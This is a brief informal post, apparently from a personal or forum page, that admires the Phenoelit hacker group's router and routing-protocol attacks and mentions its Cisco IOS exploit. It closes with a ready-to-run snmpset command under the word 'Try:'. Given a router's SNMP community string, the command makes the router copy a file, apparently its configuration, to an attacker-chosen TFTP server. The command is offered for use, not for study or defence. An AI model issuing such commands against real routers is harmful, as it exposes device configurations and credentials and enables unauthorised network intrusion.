There is a really cool hacker group which deals with Routing Protocol and Router attacks: Phenoelit. What I especially liked is the stuff about the IOS Exploit.
SNMP
Try:
snmpset -c <community> <routerIP> .1.3.6.1.4.1.9.2.1.55.<tftpserverIP> s <filename>
